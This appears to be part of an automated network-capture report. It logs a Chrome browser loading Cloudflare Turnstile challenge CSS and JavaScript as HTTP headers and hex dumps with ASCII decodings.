                                        2025-01-08 23:45:51 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                        Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                        2025-01-08 23:45:51 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                        Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                        2025-01-08 23:45:51 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                        Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                        2025-01-08 23:45:51 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                        Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                        2025-01-08 23:45:51 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                        Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        8192.168.2.1649727104.18.94.414432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-08 23:45:51 UTC383OUTGET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-08 23:45:51 UTC471INHTTP/1.1 200 OK
                                        Date: Wed, 08 Jan 2025 23:45:51 GMT
                                        Content-Type: application/javascript; charset=UTF-8
                                        Content-Length: 47521
                                        Connection: close
                                        accept-ranges: bytes
                                        last-modified: Thu, 02 Jan 2025 13:52:36 GMT
                                        cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                        access-control-allow-origin: *
                                        cross-origin-resource-policy: cross-origin
                                        Server: cloudflare
                                        CF-RAY: 8ff01048fd4943e7-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-08 23:45:51 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                        Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                        2025-01-08 23:45:51 UTC1369INData Raw: 74 28 65 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 6a 74 28 65 2c 72 29 7b 76 61 72 20 6e 3d 65 3d 3d 6e 75 6c 6c 3f 6e 75 6c 6c 3a 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 7c 7c 65 5b 22 40 40 69 74 65 72 61 74 6f 72 22 5d 3b 69 66 28 6e 21 3d 6e 75 6c 6c 29 7b 76 61 72 20 6f 3d 5b 5d 2c 63 3d 21 30 2c 75 3d 21 31 2c 67 2c 68 3b 74 72 79 7b 66 6f 72 28 6e 3d 6e 2e 63 61 6c 6c 28 65 29 3b 21 28 63 3d 28 67 3d 6e 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 6f 2e 70 75 73 68 28 67 2e 76 61 6c 75 65 29 2c 21 28 72 26 26 6f 2e 6c 65 6e 67 74 68 3d 3d 3d 72 29 29 3b 63 3d 21 30 29
                                        Data Ascii: t(e){if(Array.isArray(e))return e}function jt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0)
                                        2025-01-08 23:45:51 UTC1369INData Raw: 5d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 70 29 7b 69 66 28 6f 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 67 26 26 28 67 3d 30 2c 70 5b 30 5d 26 26 28 6e 3d 30 29 29 2c 6e 3b 29 74 72 79 7b 69 66 28 6f 3d 31 2c 63 26 26 28 75 3d 70 5b 30 5d 26 32 3f 63 2e 72 65 74 75 72 6e 3a 70 5b 30 5d 3f 63 2e 74 68 72 6f 77 7c 7c 28 28 75 3d 63 2e 72 65 74 75 72 6e 29 26 26 75 2e 63 61 6c 6c 28 63 29 2c 30 29 3a 63 2e 6e 65 78 74 29 26 26 21 28 75 3d 75 2e 63 61 6c 6c 28 63 2c 70 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 75 3b 73 77 69 74 63 68 28 63 3d 30 2c 75 26 26 28 70 3d 5b 70 5b 30 5d 26 32 2c 75 2e 76 61 6c
                                        Data Ascii: ])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.val
                                        2025-01-08 23:45:51 UTC1369INData Raw: 29 29 3b 76 61 72 20 50 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 2c 65 2e 4c 49 47 48 54 3d 22 6c 69 67 68 74 22 2c 65 2e 44 41 52 4b 3d 22 64 61 72 6b 22 7d 29 28 50 65 7c 7c 28 50 65 3d 7b 7d 29 29 3b 76 61 72 20 49 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 56 45 52 49 46 59 49 4e 47 3d 22 76 65 72 69 66 79 69 6e 67 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 76 65 72 69 66 79 69 6e 67 2d 68 61 76 69 6e 67 2d 74 72 6f 75 62 6c 65 73 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 5f 4f 56 45 52 52 55 4e 3d 22 76 65 72 69 66 79 69 6e 67 2d 6f 76 65 72 72 75 6e 22 2c 65 2e 46 41 49 4c 55 52 45 5f 57 4f 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 66 61 69
                                        Data Ascii: ));var Pe;(function(e){e.AUTO="auto",e.LIGHT="light",e.DARK="dark"})(Pe||(Pe={}));var Ie;(function(e){e.VERIFYING="verifying",e.VERIFYING_HAVING_TROUBLES="verifying-having-troubles",e.VERIFYING_OVERRUN="verifying-overrun",e.FAILURE_WO_HAVING_TROUBLES="fai
                                        2025-01-08 23:45:51 UTC1369INData Raw: 4f 4d 3d 22 63 75 73 74 6f 6d 22 7d 29 28 57 65 7c 7c 28 57 65 3d 7b 7d 29 29 3b 66 75 6e 63 74 69 6f 6e 20 4d 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 65 2e 69 6e 64 65 78 4f 66 28 72 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 69 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 75 74 6f 22 2c 22 64 61 72 6b 22 2c 22 6c 69 67 68 74 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 75 74 6f 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 63 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3e 30 26 26 65 3c 39 65 35 7d 66 75 6e 63 74 69 6f 6e 20 75 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3e 30 26 26 65 3c 33 36 65 34 7d 76 61 72 20 49 72 3d 2f 5e 5b 30 2d 39 41 2d 5a 61 2d 7a 5f 2d 5d 7b 33 2c
                                        Data Ascii: OM="custom"})(We||(We={}));function M(e,r){return e.indexOf(r)!==-1}function it(e){return M(["auto","dark","light"],e)}function ot(e){return M(["auto","never"],e)}function ct(e){return e>0&&e<9e5}function ut(e){return e>0&&e<36e4}var Ir=/^[0-9A-Za-z_-]{3,
                                        2025-01-08 23:45:51 UTC1369INData Raw: 2c 65 72 3d 22 2e 67 2d 72 65 63 61 70 74 63 68 61 22 2c 68 74 3d 22 63 66 5f 63 68 61 6c 6c 65 6e 67 65 5f 72 65 73 70 6f 6e 73 65 22 2c 5f 74 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 2c 62 74 3d 22 67 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 22 2c 74 72 3d 38 65 33 2c 45 74 3d 22 70 72 69 76 61 74 65 2d 74 6f 6b 65 6e 22 2c 72 72 3d 33 2c 6e 72 3d 35 30 30 2c 61 72 3d 35 30 30 2c 59 3d 22 22 3b 76 61 72 20 4e 72 3d 5b 22 62 67 2d 62 67 22 2c 22 64 61 2d 64 6b 22 2c 22 64 65 2d 64 65 22 2c 22 65 6c 2d 67 72 22 2c 22 6a 61 2d 6a 70 22 2c 22 6d 73 2d 6d 79 22 2c 22 72 75 2d 72 75 22 2c 22 73 6b 2d 73 6b 22 2c 22 73 6c 2d 73 69 22 2c 22 73 72 2d 62 61 22 2c 22 74 6c 2d 70 68 22 2c 22 75 6b 2d 75 61 22 5d 2c 6b
                                        Data Ascii: ,er=".g-recaptcha",ht="cf_challenge_response",_t="cf-turnstile-response",bt="g-recaptcha-response",tr=8e3,Et="private-token",rr=3,nr=500,ar=500,Y="";var Nr=["bg-bg","da-dk","de-de","el-gr","ja-jp","ms-my","ru-ru","sk-sk","sl-si","sr-ba","tl-ph","uk-ua"],k
                                        2025-01-08 23:45:51 UTC1369INData Raw: 62 6f 73 65 4c 61 6e 67 75 61 67 65 2c 6e 3d 65 2e 69 73 53 6d 61 6c 6c 65 72 46 65 65 64 62 61 63 6b 2c 6f 3d 65 2e 69 73 4d 6f 64 65 72 61 74 65 6c 79 56 65 72 62 6f 73 65 3b 72 65 74 75 72 6e 20 6e 26 26 72 3f 22 35 34 30 70 78 22 3a 6e 26 26 6f 3f 22 35 30 30 70 78 22 3a 6e 3f 22 34 38 30 70 78 22 3a 72 3f 22 36 35 30 70 78 22 3a 6f 3f 22 35 39 30 70 78 22 3a 22 35 37 30 70 78 22 7d 3b 66 75 6e 63 74 69 6f 6e 20 42 65 28 65 29 7b 69 66 28 65 3d 3d 3d 76 6f 69 64 20 30 29 74 68 72 6f 77 20 6e 65 77 20 52 65 66 65 72 65 6e 63 65 45 72 72 6f 72 28 22 74 68 69 73 20 68 61 73 6e 27 74 20 62 65 65 6e 20 69 6e 69 74 69 61 6c 69 73 65 64 20 2d 20 73 75 70 65 72 28 29 20 68 61 73 6e 27 74 20 62 65 65 6e 20 63 61 6c 6c 65 64 22 29 3b 72 65 74 75 72 6e 20 65 7d
                                        Data Ascii: boseLanguage,n=e.isSmallerFeedback,o=e.isModeratelyVerbose;return n&&r?"540px":n&&o?"500px":n?"480px":r?"650px":o?"590px":"570px"};function Be(e){if(e===void 0)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return e}
                                        2025-01-08 23:45:51 UTC1369INData Raw: 30 3b 72 65 74 75 72 6e 20 71 65 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 69 66 28 6f 3d 3d 3d 6e 75 6c 6c 7c 7c 21 63 72 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 69 66 28 74 79 70 65 6f 66 20 6f 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 69 66 28 74 79 70 65 6f 66 20 72 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 7b 69 66 28 72 2e 68 61 73 28 6f 29 29 72 65 74 75 72 6e 20 72 2e 67 65 74 28 6f 29 3b 72 2e 73 65 74 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 72 65 74 75 72 6e 20 53 65 28 6f 2c 61 72 67 75 6d 65 6e 74 73 2c 63 65 28 74
                                        Data Ascii: 0;return qe=function(o){if(o===null||!cr(o))return o;if(typeof o!="function")throw new TypeError("Super expression must either be null or a function");if(typeof r!="undefined"){if(r.has(o))return r.get(o);r.set(o,c)}function c(){return Se(o,arguments,ce(t
                                        2025-01-08 23:45:51 UTC1369INData Raw: 75 6c 64 20 6e 6f 74 20 66 69 6e 64 20 54 75 72 6e 73 74 69 6c 65 20 73 63 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34 33 37 37 37 29 3b 76 61 72 20 72 3d 65 2e 73 72 63 2c 6e 3d 7b 6c 6f 61 64 65 64 41 73 79 6e 63 3a 21 31 2c 70 61 72 61 6d 73 3a 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 2c 73 72 63 3a 72 7d 3b 28 65 2e 61 73 79 6e 63 7c 7c 65 2e 64 65 66 65 72 29 26 26 28 6e 2e 6c 6f 61 64 65 64 41 73 79 6e 63 3d 21 30 29 3b 76 61 72 20 6f 3d 72 2e 73 70 6c 69 74 28 22 3f 22 29 3b 72 65 74 75 72 6e 20 6f 2e 6c 65 6e 67 74 68 3e 31 26 26 28 6e 2e 70 61 72 61 6d 73 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 6f 5b 31 5d 29 29
                                        Data Ascii: uld not find Turnstile script tag, some features may not be available",43777);var r=e.src,n={loadedAsync:!1,params:new URLSearchParams,src:r};(e.async||e.defer)&&(n.loadedAsync=!0);var o=r.split("?");return o.length>1&&(n.params=new URLSearchParams(o[1]))
                                        2025-01-08 23:45:51 UTC1369INData Raw: 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 2c 45 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 52 61 64 69 75 73 3d 22 35 70 78 22 2c 45 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 70 78 22 2c 45 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 70 78 22 2c 45 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 3d 22 68 69 64 64 65 6e 22 2c 45 2e 73 74 79 6c 65 2e 6d 61 72 67 69 6e 3d 22 30 70 78 20 61 75 74 6f 22 3b 76 61 72 20 53 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 66 72 61 6d 65 22 29 3b 53 2e 69 64 3d 22 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2d 66 72 22 29 2c 53 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 68 29 2c 53 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 6c 6c 6f 77 22
                                        Data Ascii: yle.backgroundColor="#ffffff",E.style.borderRadius="5px",E.style.left="0px",E.style.top="0px",E.style.overflow="hidden",E.style.margin="0px auto";var S=document.createElement("iframe");S.id="".concat(e,"-fr"),S.setAttribute("src",h),S.setAttribute("allow"


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        9192.168.2.1649729104.18.94.414432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-08 23:45:52 UTC727OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ff01048fb6d4364&lang=auto HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: script
                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/sr46z/0x4AAAAAAA4FpD7uVAQN4KLZ/auto/fbE/normal/auto/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-08 23:45:52 UTC331INHTTP/1.1 200 OK
                                        Date: Wed, 08 Jan 2025 23:45:52 GMT
                                        Content-Type: application/javascript; charset=UTF-8
                                        Content-Length: 123645
                                        Connection: close
                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        Server: cloudflare
                                        CF-RAY: 8ff0104d8be480da-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-08 23:45:52 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 71 51 4c 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70
                                        Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qqQL2={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcep
                                        2025-01-08 23:45:52 UTC1369INData Raw: 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 25 32 32 25 33 45 43 6c 69 63 6b 25 32 30 68 65 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 63 68 65 63 6b 5f 64 65 6c 61 79 73 22 3a 22 56 65 72 69 66 69 63 61 74 69 6f 6e 25 32 30 69 73 25 32 30 74 61 6b 69 6e 67 25 32 30 6c 6f 6e 67 65 72 25 32 30 74 68 61 6e 25 32 30 65 78 70 65 63 74 65 64 2e 25 32 30 43 68 65 63 6b 25 32 30 79 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25
                                        Data Ascii: fundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%
                                        2025-01-08 23:45:52 UTC1369INData Raw: 67 6f 2c 67 70 2c 67 77 2c 67 41 2c 67 42 2c 67 46 2c 67 47 2c 67 48 2c 65 4f 2c 65 50 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 30 37 29 29 2f 31 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 38 30 34 29 29 2f 32 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 36 30 35 29 29 2f 33 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 36 30 32 29 29 2f 34 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 38 39 31 29 29 2f 35 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 32 39 29 29 2f 36 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 37 